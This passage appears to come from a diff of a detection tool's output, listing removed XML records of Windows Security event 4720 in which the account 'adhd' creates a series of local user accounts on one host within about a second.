Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Shirley&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Shirley</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5125</recordid>
-            <time>2020-06-11 22:05:08.423919600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.4239196Z'/&gt;&lt;EventRecordID&gt;5125&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Joyce&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1180&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Joyce&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Joyce</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5119</recordid>
-            <time>2020-06-11 22:05:08.331315700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.3313157Z'/&gt;&lt;EventRecordID&gt;5119&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jerry&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1179&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jerry&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jerry</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5113</recordid>
-            <time>2020-06-11 22:05:08.242848800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.2428488Z'/&gt;&lt;EventRecordID&gt;5113&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Dennis&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1178&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Dennis&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Dennis</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5107</recordid>
-            <time>2020-06-11 22:05:08.126596200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.1265962Z'/&gt;&lt;EventRecordID&gt;5107&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jack&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1177&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jack&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jack</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5101</recordid>
-            <time>2020-06-11 22:05:08.27083700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.0270837Z'/&gt;&lt;EventRecordID&gt;5101&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Gregory&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1176&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Gregory&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Gregory</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5095</recordid>
-            <time>2020-06-11 22:05:07.926663000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.9266630Z'/&gt;&lt;EventRecordID&gt;5095&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Christopher&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1175&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Christopher&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Christopher</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5089</recordid>
-            <time>2020-06-11 22:05:07.839378000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.8393780Z'/&gt;&lt;EventRecordID&gt;5089&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Michael&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1174&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Michael&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Michael</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5083</recordid>
-            <time>2020-06-11 22:05:07.742897300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.7428973Z'/&gt;&lt;EventRecordID&gt;5083&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Arthur&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1173&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Arthur&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Arthur</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5077</recordid>
-            <time>2020-06-11 22:05:07.656725400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.6567254Z'/&gt;&lt;EventRecordID&gt;5077&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Ann&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1172&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data 